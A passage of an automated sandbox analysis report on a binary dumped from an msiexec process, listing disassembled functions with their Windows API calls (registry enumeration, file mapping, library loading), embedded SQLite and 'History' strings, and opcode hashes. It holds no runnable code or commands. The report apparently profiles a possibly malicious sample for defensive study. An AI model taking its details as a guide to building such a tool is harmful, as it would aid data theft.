                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                            • API String ID: 3510742995-272990098
                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                            Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                            • memset.MSVCRT ref: 0040C439
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 1265369119-0
                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                            Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: gj
                                                                            • API String ID: 1297977491-4203073231
                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                            Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                            • free.MSVCRT ref: 0040E9D3
                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$free
                                                                            • String ID:
                                                                            • API String ID: 2241099983-0
                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                            Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                            • malloc.MSVCRT ref: 004174BD
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                            • free.MSVCRT ref: 004174E4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                            • String ID:
                                                                            • API String ID: 4053608372-0
                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                            Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                            • String ID:
                                                                            • API String ID: 4247780290-0
                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                            Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                            • memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                            • String ID:
                                                                            • API String ID: 1471605966-0
                                                                            • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                            • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                            Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                            • String ID: \StringFileInfo\
                                                                            • API String ID: 102104167-2245444037
                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                            Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                            Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _memicmpwcslen
                                                                            • String ID: @@@@$History
                                                                            • API String ID: 1872909662-685208920
                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                            Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004100FB
                                                                            • memset.MSVCRT ref: 00410112
                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                            • String ID: </%s>
                                                                            • API String ID: 3400436232-259020660
                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                            Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D58D
                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                            • String ID: caption
                                                                            • API String ID: 1523050162-4135340389
                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                            Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                            • String ID: MS Sans Serif
                                                                            • API String ID: 210187428-168460110
                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                            Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcsicmpmemset
                                                                            • String ID: edit
                                                                            • API String ID: 2747424523-2167791130
                                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                            Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                            • API String ID: 3150196962-1506664499
                                                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                            Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp
                                                                            • String ID:
                                                                            • API String ID: 3384217055-0
                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                            Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            • API String ID: 368790112-0
                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                            Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                            • String ID:
                                                                            • API String ID: 1889144086-0
                                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                            Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                            • String ID:
                                                                            • API String ID: 1661045500-0
                                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                            Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                            Strings
                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
